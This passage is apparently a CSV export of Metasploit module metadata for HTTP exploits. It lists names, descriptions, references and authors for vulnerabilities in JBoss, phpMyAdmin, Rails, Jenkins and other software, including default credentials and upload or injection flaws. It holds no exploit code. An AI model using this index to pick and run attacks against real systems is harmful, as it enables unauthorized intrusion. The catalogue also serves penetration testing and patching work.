00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/auxilium_upload_exec.rb","exploit","multi/http/auxilium_upload_exec","exploit/multi/http/auxilium_upload_exec","Auxilium RateMyPet Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in Auxilium RateMyPet's. The site banner uploading feature can be abused to upload an arbitrary file to the web server, which is accessible in the 'banner' directory, thus allowing remote code execution.","Metasploit Framework License (BSD)","f","2012-09-14 00:00:00",0,,"aggressive","t","EDB-21329, OSVDB-85554","DaOne, sinn3r " 119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/axis2_deployer.rb","exploit","multi/http/axis2_deployer","exploit/multi/http/axis2_deployer","Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",600,"This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.","Metasploit Framework License (BSD)","f","2010-12-30 00:00:00",0,,"aggressive","t","CVE-2010-0219, URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf, URL-http://www.rapid7.com/security-center/advisories/R7-0037.jsp","Chris John Riley, Joshua Abraham " 120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/cuteflow_upload_exec.rb","exploit","multi/http/cuteflow_upload_exec","exploit/multi/http/cuteflow_upload_exec","CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in CuteFlow version 2.11.2 or prior. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the 'upload/___1/' directory and then execute it.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",0,,"aggressive","t","OSVDB-84829, URL-http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/","Brendan Coles " 121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/eaton_nsm_code_exec.rb","exploit","multi/http/eaton_nsm_code_exec","exploit/multi/http/eaton_nsm_code_exec","Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",600,"This module exploits a vulnerability in lib/dbtools.inc which uses unsanitized user input inside a eval() call. Additionally the base64 encoded user credentials are extracted from the database of the application. Please note that in order to be able to steal credentials, the vulnerable service must have at least one USV module (an entry in the ""nodes"" table in mgedb.db)","Metasploit Framework License (BSD)","t","2012-06-26 00:00:00",0,,"aggressive","t","OSVDB-83199, URL-http://secunia.com/advisories/49103/","h0ng10, sinn3r " 122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/extplorer_upload_exec.rb","exploit","multi/http/extplorer_upload_exec","exploit/multi/http/extplorer_upload_exec","eXtplorer v2.1 Arbitrary File Upload Vulnerability",600,"This module exploits an authentication bypass vulnerability in eXtplorer versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application. This application has an upload feature that allows an authenticated user with administrator roles to upload arbitrary files to any writable directory in the web root. This module uses an authentication bypass vulnerability to upload and execute a file.","Metasploit Framework License (BSD)","f","2012-12-31 00:00:00",0,,"aggressive","t","BID-57058, OSVDB-88751, URL-http://extplorer.net/issues/105, URL-http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability","Brendan Coles " 123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/familycms_less_exec.rb","exploit","multi/http/familycms_less_exec","exploit/multi/http/familycms_less_exec","Family Connections less.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in Family Connections 2.7.1. It's in the dev/less.php script and is due to an insecure use of system(). Authentication isn't required to exploit the vulnerability but register_globals must be set to On.","Metasploit Framework License (BSD)","f","2011-11-29 00:00:00",0,,"aggressive","t","EDB-18198, URL-http://rwx.biz.nf/advisories/fc_cms_rce_adv.html, URL-http://sourceforge.net/apps/trac/fam-connections/ticket/407, URL-https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/","juan vazquez , mr_me " 124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/freenas_exec_raw.rb","exploit","multi/http/freenas_exec_raw","exploit/multi/http/freenas_exec_raw","FreeNAS exec_raw.php Arbitrary Command Execution",500,"This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands. NOTE: This module works best with php/meterpreter payloads.","Metasploit Framework License (BSD)","t","2010-11-06 00:00:00",0,,"aggressive","t","URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download","MC " 125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/gitorious_graph.rb","exploit","multi/http/gitorious_graph","exploit/multi/http/gitorious_graph","Gitorious Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in gitorious. Unvalidated input is passed to the shell allowing command execution.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",0,,"aggressive","t","URL-http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce","joernchen " 126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/glassfish_deployer.rb","exploit","multi/http/glassfish_deployer","exploit/multi/http/glassfish_deployer","Sun/Oracle GlassFish Server Authenticated Code Execution",600,"This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.","Metasploit Framework License (BSD)","f","2011-08-04 00:00:00",0,,"aggressive","t","CVE-2011-0807, OSVDB-71948","Joshua Abraham , juan vazquez , sinn3r " 127,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/glossword_upload_exec.rb","exploit","multi/http/glossword_upload_exec","exploit/multi/http/glossword_upload_exec","Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",600,"This module exploits a file upload vulnerability in Glossword versions 1.8.8 to 1.8.12 when run as a standalone application. This application has an upload feature that allows an authenticated user with administrator roles to upload arbitrary files to the 'gw_temp/a/' directory.","Metasploit Framework License (BSD)","t","2013-02-05 00:00:00",0,,"aggressive","t","EDB-24456, OSVDB-89960","AkaStep, Brendan Coles " 128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/horde_href_backdoor.rb","exploit","multi/http/horde_href_backdoor","exploit/multi/http/horde_href_backdoor","Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",600,"This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.","Metasploit Framework License (BSD)","f","2012-02-13 00:00:00",0,,"aggressive","t","CVE-2012-0209, URL-http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155, URL-http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/","Eric Romang, jduck " 129,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb","exploit","multi/http/hp_sitescope_uploadfileshandler","exploit/multi/http/hp_sitescope_uploadfileshandler","HP SiteScope Remote Code Execution",400,"This module exploits a code execution flaw in HP SiteScope. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the create operation, available through the APIPreferenceImpl AXIS service, to create a new account with empty credentials and, subsequently, uses the new account to abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux CentOS 6.3.","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55269, BID-55273, OSVDB-85121, OSVDB-85151, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-174/, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-175/","juan vazquez , rgod " 130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_bshdeployer.rb","exploit","multi/http/jboss_bshdeployer","exploit/multi/http/jboss_bshdeployer","JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",600,"This module can be used to install a WAR file payload on JBoss servers that have an exposed ""jmx-console"" application. The payload is put on the server by using the jboss.system:BSHDeployer\'s createScriptDeployment() method.","BSD License","t","2010-04-26 00:00:00",0,,"aggressive","t","CVE-2010-0738, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Konrads Smelkovs, Patrick Hof, h0ng10, jduck " 131,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_deploymentfilerepository.rb","exploit","multi/http/jboss_deploymentfilerepository","exploit/multi/http/jboss_deploymentfilerepository","JBoss Java Class DeploymentFileRepository WAR Deployment",600,"This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file which then deploys the WAR file.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",0,,"aggressive","t","CVE-2010-0738, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Jacob Giannantonio, MC , Patrick Hof, h0ng10" 132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_invoke_deploy.rb","exploit","multi/http/jboss_invoke_deploy","exploit/multi/http/jboss_invoke_deploy","JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",600,"This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor's JMX Invoker exposed on the ""JMXInvokerServlet"". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","CVE-2007-1036, OSVDB-33744, URL-http://www.redteam-pentesting.de/publications/jboss","Jens Liebchen, Patrick Hof, h0ng10" 133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_maindeployer.rb","exploit","multi/http/jboss_maindeployer","exploit/multi/http/jboss_maindeployer","JBoss JMX Console Deployer Upload and Execute",600,"This module can be used to execute a payload on JBoss servers that have an exposed ""jmx-console"" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","CVE-2007-1036, CVE-2010-0738, OSVDB-33744, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Patrick Hof, h0ng10, jduck " 134,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jenkins_script_console.rb","exploit","multi/http/jenkins_script_console","exploit/multi/http/jenkins_script_console","Jenkins Script-Console Java Execution",400,"This module uses the Jenkins Groovy script console to execute OS commands using Java.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",0,,"aggressive","t","URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console","Spencer McIntyre, jamcut" 135,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/kordil_edms_upload_exec.rb","exploit","multi/http/kordil_edms_upload_exec","exploit/multi/http/kordil_edms_upload_exec","Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the '/kordil_edms/userpictures/' directory.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",0,,"aggressive","t","EDB-24547, OSVDB-90645","Brendan Coles " 136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/lcms_php_exec.rb","exploit","multi/http/lcms_php_exec","exploit/multi/http/lcms_php_exec","LotusCMS 3.0 eval() Remote Command Execution",600,"This module exploits a vulnerability found in Lotus CMS 3.0's Router() function. This is done by embedding PHP code in the 'page' parameter, which will be passed to a eval call, therefore allowing remote code execution. The module can either automatically pick up a 'page' parameter from the default page, or manually specify one in the URI option. To use the automatic method, please supply the URI with just a directory path, for example: ""/lcms/"". To manually configure one, you may do: ""/lcms/somepath/index.php?page=index""","Metasploit Framework License (BSD)","f","2011-03-03 00:00:00",0,,"aggressive","t","OSVDB-75095, URL-http://secunia.com/secunia_research/2011-21/","Alligator Security Team, dflah_ , sherl0ck_ , sinn3r " 137,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/log1cms_ajax_create_folder.rb","exploit","multi/http/log1cms_ajax_create_folder","exploit/multi/http/log1cms_ajax_create_folder","Log1 CMS writeInfo() PHP Code Injection",600,"This module exploits the ""Ajax File and Image Manager"" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"aggressive","t","CVE-2011-4825, EDB-18075, EDB-18151, OSVDB-76928","Adel SBM, EgiX, sinn3r " 138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/manageengine_search_sqli.rb","exploit","multi/http/manageengine_search_sqli","exploit/multi/http/manageengine_search_sqli","ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",600,"This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page, which results in remote code execution under the context of SYSTEM in Windows; or as the user in Linux. Authentication is not required in order to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-10-18 00:00:00",0,,"aggressive","t","BID-56138, EDB-22094","egypt , sinn3r , xistence " 139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/mobilecartly_upload_exec.rb","exploit","multi/http/mobilecartly_upload_exec","exploit/multi/http/mobilecartly_upload_exec","MobileCartly 1.0 Arbitrary File Creation Vulnerability",600,"This module exploits a vulnerability in MobileCartly. The savepage.php file does not do any permission checks before using file_put_contents(), which allows any user to have direct control of that function to create files under the 'pages' directory by default, or anywhere else as long as the user has WRITE permission.","Metasploit Framework License (BSD)","f","2012-08-10 00:00:00",0,,"aggressive","t","BID-55399, EDB-20422","Yakir Wizman , sinn3r " 140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/movabletype_upgrade_exec.rb","exploit","multi/http/movabletype_upgrade_exec","exploit/multi/http/movabletype_upgrade_exec","Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",300,"This module can be used to execute a payload on MoveableType (MT) that exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. The vulnerability arises due to the following properties: 1. This script may be invoked remotely without requiring authentication to any MT instance. 2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters. 3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection.","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"aggressive","t","CVE-2012-6315, CVE-2013-0209, URL-http://www.movabletype.org/2013/01/movable_type_438_patch.html, URL-http://www.sec-1.com/blog/?p=402","Gary O'Leary-Steele, Kacper Nowak, Nick Blundell" 141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/mutiny_subnetmask_exec.rb","exploit","multi/http/mutiny_subnetmask_exec","exploit/multi/http/mutiny_subnetmask_exec","Mutiny Remote Command Execution",600,"This module exploits an authenticated command injection vulnerability in the Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit the vulnerability the mutiny user must have access to the admin interface. The injected commands are executed with root privileges. This module has been tested successfully on Mutiny 4.2-1.05.","Metasploit Framework License (BSD)","t","2012-10-22 00:00:00",1,,"passive","t","BID-56165, CVE-2012-3001, OSVDB-86570, URL-http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html, US-CERT-VU-841851","Christopher Campbell, juan vazquez " 142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/netwin_surgeftp_exec.rb","exploit","multi/http/netwin_surgeftp_exec","exploit/multi/http/netwin_surgeftp_exec","Netwin SurgeFTP Remote Command Execution",400,"This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 or prior. In order to execute commands via the FTP service, please note that you must have a valid credential to the web-based administrative console.","Metasploit Framework License (BSD)","f","2012-12-06 00:00:00",,,"aggressive","t","EDB-23522","Spencer McIntyre, sinn3r " 143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/op5_license.rb","exploit","multi/http/op5_license","exploit/multi/http/op5_license","OP5 license.php Remote Command Execution",600,"This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.","Metasploit Framework License (BSD)","t","2012-01-05 00:00:00",0,,"aggressive","t","CVE-2012-0261, OSVDB-78064, URL-http://secunia.com/advisories/47417/, URL-http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf, URL-http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/","Peter Osterberg " 144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/op5_welcome.rb","exploit","multi/http/op5_welcome","exploit/multi/http/op5_welcome","OP5 welcome Remote Command Execution",600,"This module exploits an arbitrary root command execution vulnerability in OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.","Metasploit Framework License (BSD)","t","2012-01-05 00:00:00",0,,"aggressive","t","CVE-2012-0262, OSVDB-78065, URL-http://secunia.com/advisories/47417/, URL-http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf, URL-http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/","Peter Osterberg " 145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/openfire_auth_bypass.rb","exploit","multi/http/openfire_auth_bypass","exploit/multi/http/openfire_auth_bypass","Openfire Admin Console Authentication Bypass",600,"This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might turn the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually.","Metasploit Framework License (BSD)","t","2008-11-10 00:00:00",0,,"aggressive","t","BID-32189, CVE-2008-6508, EDB-7075, OSVDB-49663, URL-http://community.igniterealtime.org/thread/35874","Andreas Kurtz, h0ng10" 146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/php_cgi_arg_injection.rb","exploit","multi/http/php_cgi_arg_injection","exploit/multi/http/php_cgi_arg_injection","PHP CGI Argument Injection",600,"When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: ""if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the ""encoded in a system-defined manner"" from the RFC) and then passes them to the CGI binary.""","Metasploit Framework License (BSD)","f","2012-05-03 00:00:00",0,,"aggressive","t","CVE-2012-1823, OSVDB-81633, URL-http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/","egypt , hdm , jjarmoc" 147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/php_volunteer_upload_exec.rb","exploit","multi/http/php_volunteer_upload_exec","exploit/multi/http/php_volunteer_upload_exec","PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in PHP Volunteer Management System, version v1.0.2 or prior. This application has an upload feature that allows an authenticated user to upload anything to the 'uploads' directory, which is actually reachable by anyone without a credential. An attacker can easily abuse this upload functionality first by logging in with the default credential (admin:volunteer), upload a malicious payload, and then execute it by sending another GET request.","Metasploit Framework License (BSD)","f","2012-05-28 00:00:00",0,,"aggressive","t","EDB-18941, OSVDB-82391","Ashoo , sinn3r " 148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpldapadmin_query_engine.rb","exploit","multi/http/phpldapadmin_query_engine","exploit/multi/http/phpldapadmin_query_engine","phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection",600,"This module exploits a vulnerability in the lib/functions.php that allows attackers input parsed directly to the create_function() php function. A patch was issued that uses a whitelist regex expression to check the user supplied input before being parsed to the create_function() call.","Metasploit Framework License (BSD)","f","2011-10-24 00:00:00",0,,"aggressive","t","BID-50331, CVE-2011-4075, EDB-18021, OSVDB-76594, URL-http://sourceforge.net/support/tracker.php?aid=3417184","EgiX , TecR0c , mr_me " 149,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb","exploit","multi/http/phpmyadmin_3522_backdoor","exploit/multi/http/phpmyadmin_3522_backdoor","phpMyAdmin 3.5.2.2 server_sync.php Backdoor",300,"This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.","Metasploit Framework License (BSD)","f","2012-09-25 00:00:00",0,,"aggressive","t","URL-http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php","hdm " 150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpmyadmin_preg_replace.rb","exploit","multi/http/phpmyadmin_preg_replace","exploit/multi/http/phpmyadmin_preg_replace","phpMyAdmin Authenticated Remote Code Execution via preg_replace()",600,"This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3. PHP versions > 5.4.6 are not vulnerable.","Metasploit Framework License (BSD)","f","2013-04-25 00:00:00",0,,"aggressive","t","CVE-2013-3238, EDB-25003, OSVDB-92793, PMASA-2013-2, URL-http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php, URL-http://www.waraxe.us/advisory-103.html, waraxe-2013-SA#103","Ben Campbell , Janek ""waraxe"" Vind" 151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpscheduleit_start_date.rb","exploit","multi/http/phpscheduleit_start_date","exploit/multi/http/phpscheduleit_start_date","phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",600,"This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt software. This vulnerability is only exploitable when the magic_quotes_gpc PHP option is 'off'. Authentication is not required to exploit the bug. Version 1.2.10 and earlier of phpScheduleIt are affected.","BSD License","f","2008-10-01 00:00:00",0,,"aggressive","t","BID-31520, CVE-2008-6132, EDB-6646, OSVDB-48797","EgiX, juan vazquez " 152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phptax_exec.rb","exploit","multi/http/phptax_exec","exploit/multi/http/phptax_exec","PhpTax pfilez Parameter Exec Remote Code Injection",600,"This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-10-08 00:00:00",0,,"aggressive","t","EDB-21665, OSVDB-86992","Jean Pascal Pereira , sinn3r " 153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/plone_popen2.rb","exploit","multi/http/plone_popen2","exploit/multi/http/plone_popen2","Plone and Zope XMLTools Remote Command Execution",600,"Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.","Metasploit Framework License (BSD)","f","2011-10-04 00:00:00",0,,"aggressive","t","CVE-2011-3587, EDB-18262, OSVDB-76105, URL-http://plone.org/products/plone/security/advisories/20110928","Nick Miles, Plone Security team, TecR0c " 154,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/pmwiki_pagelist.rb","exploit","multi/http/pmwiki_pagelist","exploit/multi/http/pmwiki_pagelist","PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit",600,"This module exploits an arbitrary command execution vulnerability in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is inside /scripts/pagelist.php.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"aggressive","t","BID-50776, CVE-2011-4453, EDB-18149, OSVDB-77261, URL-http://www.pmwiki.org/wiki/PITS/01271","EgiX, TecR0c " 155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/polarcms_upload_exec.rb","exploit","multi/http/polarcms_upload_exec","exploit/multi/http/polarcms_upload_exec","PolarPearCms PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in PlarPear CMS By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-01-21 00:00:00",0,,"aggressive","t","CVE-2013-0803","Fady Mohamed Osman" 156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/qdpm_upload_exec.rb","exploit","multi/http/qdpm_upload_exec","exploit/multi/http/qdpm_upload_exec","qdPM v7 Arbitrary PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in qdPM - a web-based project management software. The user profile's photo upload feature can be abused to upload any arbitrary file onto the victim server machine, which allows remote code execution. Please note in order to use this module, you must have a valid credential to sign in.","Metasploit Framework License (BSD)","f","2012-06-14 00:00:00",0,,"aggressive","t","EDB-19154, OSVDB-82978","loneferret, sinn3r " 157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/rails_json_yaml_code_exec.rb","exploit","multi/http/rails_json_yaml_code_exec","exploit/multi/http/rails_json_yaml_code_exec","Ruby on Rails JSON Processor YAML Deserialization Code Execution",600,"This module exploits a remote code execution vulnerability in the JSON request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",0,,"aggressive","t","CVE-2013-0333","egypt , jjarmoc, lian" 158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb","exploit","multi/http/rails_xml_yaml_code_exec","exploit/multi/http/rails_xml_yaml_code_exec","Ruby on Rails XML Processor YAML Deserialization Code Execution",600,"This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"aggressive","t","CVE-2013-0156, URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156","charliesome, espes, hdm , lian" 159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sflog_upload_exec.rb","exploit","multi/http/sflog_upload_exec","exploit/multi/http/sflog_upload_exec","Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",600,"This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of ""admin:secret"", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-07-06 00:00:00",0,,"aggressive","t","EDB-19626, OSVDB-83767","dun, sinn3r " 160,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sit_file_upload.rb","exploit","multi/http/sit_file_upload","exploit/multi/http/sit_file_upload","Support Incident Tracker <= 3.65 Remote Command Execution",600,"This module combines two separate issues within Support Incident Tracker (<= 3.65) application to upload arbitrary data and thus execute a shell. The two issues exist in ftp_upload_file.php. The first vulnerability exposes the upload dir used to store attachments. The second vulnerability allows arbitrary file upload since there is no validation function to prevent from uploading any file type. Authentication is required to exploit both vulnerabilities.","Metasploit Framework License (BSD)","f","2011-11-10 00:00:00",0,,"aggressive","t","CVE-2011-3829, CVE-2011-3833, OSVDB-76999, OSVDB-77003, URL-http://secunia.com/secunia_research/2011-75/, URL-http://secunia.com/secunia_research/2011-79/","Secunia Research, juan vazquez " 161,"2013-05-07 